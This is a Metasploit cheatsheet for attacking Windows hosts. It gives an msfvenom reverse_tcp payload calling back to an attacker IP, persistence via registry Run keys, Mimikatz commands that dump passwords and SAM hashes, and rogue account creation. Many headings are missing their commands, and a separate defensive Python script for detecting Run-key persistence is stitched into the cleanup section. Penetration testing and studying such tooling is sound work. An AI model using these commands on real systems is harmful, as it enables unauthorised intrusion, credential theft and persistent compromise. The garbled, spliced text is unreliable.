Metasploit Cheatsheet
Author: techvomit.net

Setup the Database

service postgresql start
kali msfdb init

Test it:

You’ll know it worked if you see [*] postgresql connected to msf.

Resource: https://docs.kali.org/general-use/starting-metasploit-framework-in-kali

Troubleshooting database connectivity issues

Start by restarting the postgres service:

service postgresql restart

If that doesn’t work, try destroying and recreating the database:

Then test it:

Resource: https://stackoverflow.com/questions/32561760/metasploit-cant-use-default-msf3-to-connect


Meterpreter

Get current user info

View running jobs

Useful if you’re running something with exploit -j -z

Upload file

You could use this in conjunction with an Empire payload, for example.

upload /tmp/launcher.bat C:\\Users\\target_user\\Downloads

Create rogue user on a windows system

run getgui -u <user to create> -p <password to set>

Resource: https://www.coengoedegebure.com/hacking-windows-with-meterpreter/#anchor_createanewaccount

Mimikatz

To get started, run:

Show commands

Dump all creds:

Run mimikatz command examples

mimikatz_command -f sekurlsa::searchPasswords
mimikatz_command -f sekurlsa::logonPasswords
mimikatz_command -f samdump::hashes

Interact with harvested credentials

List credentials

Delete all smb credentials

Download remote file to current directory

Edit remote file

Resource: https://stackoverflow.com/questions/30642668/metasploit-meterpreter-session-editing-files-with-vi-editor

Run commands on local system

All you need to do is add an “l” before the command you want to run.

Current directory on system running msf:

Run ls:

Change directory:

The file will be in the directory shown by lpwd.

Channels

You can spawn a channel off of a session by hitting ctrl-z.

List:

Interact:

Destroy:


Persistence

Generate a malicious exe (note that the payload you choose may be different):

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attackers ip> LPORT=4444 -f exe -o /tmp/evil.exe

Run this in meterpreter:

run post/windows/manage/persistence_exe REXEPATH=/tmp/evil.exe REXENAME=default.exe STARTUP=USER LocalExePath=C:\\tmp

or background meterpreter and use the post module:

use post/windows/manage/persistence_exe
set REXEPATH /tmp/evil.exe
set SESSION <session number>
set STARTUP USER
set LocalExePath C:\\tmp
run

STARTUP can be USER (the registry key is written under HKCU - HKEY_CURRENT_USER), SYSTEM (the registry key is written under HKLM - HKEY_LOCAL_MACHINE), or SERVICE (a rogue service is created), which doesn’t seem to work very well.

Cleanup:

The cleanup rc file does not work very well. As a result, take note of the registry key and the associated file that get dropped so you can clean them up later, and make sure to note which user you’re running as. To remove the registry key (assuming USER was specified for STARTUP and hFaZvOAsF is the key name), run the following command:

reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ /v hFaZvOAsF /f
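From the defender's side, the same artifacts are easy to sweep for. The following Python is an added example (not from the cheatsheet or from Metasploit): it parses constructed `reg query` output for the Run key and flags values that point into a scratch directory such as the C:\tmp LocalExePath used above, or whose value name looks generated like hFaZvOAsF. The sample entries, directory list and case-flip heuristic are my own assumptions.

```python
import re

# Constructed sample of `reg query HKCU\...\Run` output (not real host data).
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive       REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    hFaZvOAsF      REG_SZ    C:\tmp\default.exe
    SecurityHealth REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
"""

# Assumed list of directories where a legitimate autostart rarely lives;
# persistence_exe drops its copy into LocalExePath (C:\tmp in the cheatsheet).
SUSPICIOUS_DIRS = ("c:\\tmp\\", "\\temp\\", "\\appdata\\local\\temp\\", "c:\\users\\public\\")

# One value line: <name> <REG_type> <data>, indented under the key header.
LINE_RE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s+(.*)$")

def parse_run_values(text):
    """Return (value_name, reg_type, data) tuples from reg query output."""
    return [m.groups() for m in map(LINE_RE.match, text.splitlines()) if m]

def looks_random(name):
    """Heuristic: many upper/lower flips, as in generated names like hFaZvOAsF."""
    if not name.isalpha() or len(name) < 6:
        return False
    flips = sum(1 for a, b in zip(name, name[1:]) if a.isupper() != b.isupper())
    return flips / (len(name) - 1) >= 0.5

def exe_path(data):
    """Strip surrounding quotes and arguments, returning the lower-cased executable path."""
    data = data.strip()
    if data.startswith('"'):
        return data[1:data.find('"', 1)].lower()
    return data.split(" ")[0].lower()

def find_suspicious_run_entries(text):
    """Value names whose target sits in a scratch directory or whose name looks generated."""
    hits = []
    for name, _reg_type, data in parse_run_values(text):
        path = exe_path(data)
        if any(d in path for d in SUSPICIOUS_DIRS) or looks_random(name):
            hits.append(name)
    return hits

if __name__ == "__main__":
    for hit in find_suspicious_run_entries(SAMPLE_REG_QUERY):
        print("suspicious Run value:", hit)
```

Feed it the output of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` (and the HKLM equivalent for STARTUP=SYSTEM) and review every hit rather than deleting blindly, since the heuristic will also catch unusual but legitimate names.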

Start in quiet mode

Resource: https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf


Show advanced module options


Source: https://techvomit.net/metasploit-cheatsheet/